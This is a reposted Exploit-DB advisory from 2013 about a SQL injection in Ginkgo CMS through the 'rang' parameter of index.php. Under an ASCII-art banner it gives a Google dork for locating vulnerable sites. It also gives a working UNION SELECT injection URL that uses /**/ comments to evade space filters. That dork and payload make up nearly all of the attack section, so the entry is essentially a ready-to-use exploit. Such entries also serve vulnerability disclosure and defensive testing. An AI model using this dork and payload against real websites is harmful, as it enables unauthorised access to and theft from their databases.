Ginkgo CMS – ‘index.php?rang’ SQL Injection - 体验盒子

作者： Raw-x

日期： 2013-08-02

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/27274/

 __ ___ ________ __ __ ________ 
/\ \ /\_ \ /\_____\ /\ \ /\ \ /\_`\ /\ \/\ \
\ \ \____\//\ \\/____//'/'\ \ \________\ \ \/'\ \ \ \L\ \ \ \ \ \ 
 \ \ \__/\ \/\ \ \ \ \//'/'\ \_ `\/'__`\ /'___\ \ , <\ \ ,/\ \ \ \ \
\ \ \L\ \ \ \_\ \ \_\ \_ //'/'___ \ \ \ \ \/\ \L\.\_/\ \__/\ \ \\`\ __\ \ \\ \\ \ \_\ \ 
 \ \____/\ \____/ /\____\/\_______\\ \_\ \_\ \__/.\_\ \____\\ \_\ \_\/\_\\ \_\ \_\ \_____\
\/___/\/___/\/____/\/_______/ \/_/\/_/\/__/\/_/\/____/ \/_/\/_/\/_/ \/_/\/ /\/_____/

############################################################################################
# Exploit Title : Ginkgo CMS SQL injection #
# Date: 31 July 2013 #
# Exploit Author: Raw-x# 
# Site: http://www.ginkgo-cms.com/ # 
# Tested on : Linux#
############################################################################################

Dork: 

~~~ inurl:"index.php?rang=" intext:"Ginkgo CMS" ~~~

Examples:

http://server/index.php?rang=5'/**/div/**/0/**/UNION/**/SELECT/**/1,2,3,4,5-- -


############################################################################################
# Thanks to: lulzhack.ru | zentrixplus.net #
############################################################################################